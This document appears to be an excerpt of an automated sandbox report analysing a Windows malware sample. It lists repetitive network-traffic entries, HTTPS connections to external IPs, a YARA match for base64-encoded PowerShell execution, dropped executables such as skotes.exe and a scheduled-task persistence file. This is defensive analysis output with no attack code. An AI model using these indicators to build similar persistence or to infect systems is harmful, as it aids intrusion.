Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50257
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50268
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50272
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50281
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50280
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50282
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50285
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50286
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50290
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50294
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 50296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 50210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:50222 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.64.117.218:443 -> 192.168.2.5:50254 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50264 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.5:50270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50285 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50290 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50324 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 mouse low level NULL

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_8712.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8712, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: DocumentsECAFHIIJJE.exe.0.dr	Static PE information: section name:
Source: DocumentsECAFHIIJJE.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.20.dr	Static PE information: section name:
Source: skotes.exe.20.dr	Static PE information: section name: .idata
Source: random[1].exe.23.dr	Static PE information: section name:
Source: random[1].exe.23.dr	Static PE information: section name: .idata
Source: 0ac2a0f3ae.exe.23.dr	Static PE information: section name:
Source: 0ac2a0f3ae.exe.23.dr	Static PE information: section name: .idata
Source: file1[1].exe.23.dr	Static PE information: section name:
Source: file1[1].exe.23.dr	Static PE information: section name: .rsrc
Source: file1[1].exe.23.dr	Static PE information: section name: .idata
Source: file1[1].exe.23.dr	Static PE information: section name:
Source: file1.exe.23.dr	Static PE information: section name:
Source: file1.exe.23.dr	Static PE information: section name: .rsrc
Source: file1.exe.23.dr	Static PE information: section name: .idata
Source: file1.exe.23.dr	Static PE information: section name:
Source: 4136f86ac7.exe.23.dr	Static PE information: section name:
Source: 4136f86ac7.exe.23.dr	Static PE information: section name: .idata
Source: random[1].exe0.23.dr	Static PE information: section name:
Source: random[1].exe0.23.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.23.dr	Static PE information: section name: .idata
Source: random[1].exe0.23.dr	Static PE information: section name:
Source: 3160604f40.exe.23.dr	Static PE information: section name:
Source: 3160604f40.exe.23.dr	Static PE information: section name: .rsrc
Source: 3160604f40.exe.23.dr	Static PE information: section name: .idata
Source: 3160604f40.exe.23.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C68B700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C68B8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C68B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C62F280
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00FFCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	23_2_00FFCB97

Source: C:\Users\user\DocumentsECAFHIIJJE.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6235A0	0_2_6C6235A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C635440	0_2_6C635440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69545C	0_2_6C69545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69542B	0_2_6C69542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69AC00	0_2_6C69AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665C10	0_2_6C665C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C672C10	0_2_6C672C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62D4E0	0_2_6C62D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666CF0	0_2_6C666CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6364C0	0_2_6C6364C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64D4D0	0_2_6C64D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6834A0	0_2_6C6834A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68C4A0	0_2_6C68C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C636C80	0_2_6C636C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63FD00	0_2_6C63FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64ED10	0_2_6C64ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C650512	0_2_6C650512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6885F0	0_2_6C6885F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C660DD0	0_2_6C660DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696E63	0_2_6C696E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62C670	0_2_6C62C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C644640	0_2_6C644640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C672E4E	0_2_6C672E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C649E50	0_2_6C649E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C663E50	0_2_6C663E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C689E30	0_2_6C689E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675600	0_2_6C675600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667E10	0_2_6C667E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6976E3	0_2_6C6976E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62BEF0	0_2_6C62BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63FEF0	0_2_6C63FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C684EA0	0_2_6C684EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68E680	0_2_6C68E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C645E90	0_2_6C645E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C639F00	0_2_6C639F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667710	0_2_6C667710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62DFE0	0_2_6C62DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C656FF0	0_2_6C656FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6777A0	0_2_6C6777A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66F070	0_2_6C66F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C648850	0_2_6C648850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64D850	0_2_6C64D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66B820	0_2_6C66B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674820	0_2_6C674820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C637810	0_2_6C637810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C0E0	0_2_6C64C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6658E0	0_2_6C6658E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6950C7	0_2_6C6950C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6560A0	0_2_6C6560A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63D960	0_2_6C63D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67B970	0_2_6C67B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B170	0_2_6C69B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64A940	0_2_6C64A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62C9A0	0_2_6C62C9A0
